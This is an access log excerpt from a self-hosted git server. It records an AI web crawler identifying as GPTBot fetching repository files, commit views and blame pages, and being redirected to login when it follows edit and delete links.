"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" -[17/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11674] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" -[17/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore?display=source" [Client 74.7.227.38] [Length 10953] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" -[17/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" -[17/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" -[17/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py?display=source" [Client 74.7.227.38] [Length 12965] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" -[17/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" -[17/Feb/2026:15:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11644] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" -[17/Feb/2026:15:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" -[17/Feb/2026:15:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" -[17/Feb/2026:15:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16090] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" -[17/Feb/2026:15:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" -[17/Feb/2026:15:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" -[17/Feb/2026:15:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf?display=source" [Client 74.7.227.38] [Length 11978] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" -[17/Feb/2026:15:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16089] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" -[17/Feb/2026:15:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf?display=source" [Client 74.7.227.38] [Length 11947] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" -[17/Feb/2026:15:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" -[17/Feb/2026:15:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2findex.html" [Client 74.7.227.38] [Length 35245] [Gzip 7.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -[17/Feb/2026:15:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" -[17/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" -[17/Feb/2026:15:34:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/keys.json" -[17/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/keys.json" -[17/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" -[17/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" -[17/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 11659] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" -[17/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" -[17/Feb/2026:15:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27659] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:34:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:15:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/keys.json" -[17/Feb/2026:15:34:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:15:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/keys.json" -[17/Feb/2026:15:34:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:34:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Footer.tsx" -[17/Feb/2026:15:34:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Header.tsx" -[17/Feb/2026:15:34:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Contact.tsx" -[17/Feb/2026:15:34:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Hero.tsx" -[17/Feb/2026:15:34:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:34:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.vscode/settings.json" -[17/Feb/2026:15:34:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.vscode/settings.json" -[17/Feb/2026:15:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 10868] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 9802] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 889] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11309] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24290] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 20833] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:15:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 20849] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:15:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8481] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:15:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.vscode/settings.json" -[17/Feb/2026:15:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/settings.json" -[17/Feb/2026:15:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.vscode/settings.json" -[17/Feb/2026:15:34:43 +0000] - 200 200 